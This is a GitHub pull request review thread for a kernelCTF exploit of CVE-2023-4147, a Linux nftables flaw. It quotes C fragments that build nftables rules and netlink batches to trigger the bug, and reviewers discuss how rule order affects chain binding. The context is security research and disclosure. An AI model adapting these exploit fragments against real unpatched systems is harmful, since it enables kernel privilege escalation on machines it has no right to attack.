-
Notifications
You must be signed in to change notification settings - Fork 412
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add kernelCTF CVE-2023-4147_mitigation #111
base: master
Are you sure you want to change the base?
Conversation
memset(rule_data, 'b', 0x100); | ||
|
||
nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_TABLE, table2_name); | ||
nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_CHAIN, chain_victim2_name); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
How do we add rule to the chain with NFT_CHAIN_BINDING flag without using chain ID (like in vulnerability) or like in rule_lookup_set1 and chain2_name?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
We can add a rule to the chain with NFT_CHAIN_BINDING set before it is bound by an immediate expr.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ok. Does that means that on the lines 279 - 300:
struct nftnl_rule * rule_bind_chain_1_2 = nftnl_rule_alloc();
nftnl_rule_set_str(rule_bind_chain_1_2, NFTNL_RULE_TABLE, table1_name);
nftnl_rule_set_str(rule_bind_chain_1_2, NFTNL_RULE_CHAIN, chain1_name);
struct nftnl_expr * expr_immediate = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain2_name);
nftnl_rule_add_expr(rule_bind_chain_1_2, expr_immediate);
struct nftnl_rule * rule_lookup_set1 = nftnl_rule_alloc();
nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_TABLE, table1_name);
// nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_CHAIN, chain2_name);
nftnl_rule_set_u32(rule_lookup_set1, NFTNL_RULE_CHAIN_ID, chain_id);
struct nftnl_expr * expr_lookup = nftnl_expr_alloc("lookup");
nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG32_00);
nftnl_expr_set_str(expr_lookup, NFTNL_EXPR_LOOKUP_SET, set1_name);
nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SET_ID, 1337);
nftnl_rule_add_expr(rule_lookup_set1, expr_lookup);
and the lines 561 - 567:
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_bind_chain_1_2);
mnl_nlmsg_batch_next(batch);
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_lookup_set1);
mnl_nlmsg_batch_next(batch);
we could change the logic of exploit to firstly add the rule_lookup_set1
to chain2_name
and then add the expr_immediate
to actually bind the chain? Based on your previous comment seems like this would allow us to skip adding by ID but use the Name instead. I see that there is a commented line there which attempts to do same thing that I just described... If it's not possible could you explain why?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
As you said, I think we can add a rule using the name by changing the order of the rules.
b2e2b9f
to
43a5a81
Compare
@@ -0,0 +1,12 @@ | |||
- Requirements: | |||
- Capabilites: CAP_NET_ADMIN |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I see that some of the comments from PR#112 could be applied to PR#111 as COS and Mitigation exploits are similar. For example here there is a small nit picking on Capabilites --> "Capabilities". Could you check recommendations on PR#112 and synchronise changes between PR#112 and PR111 please?
No description provided.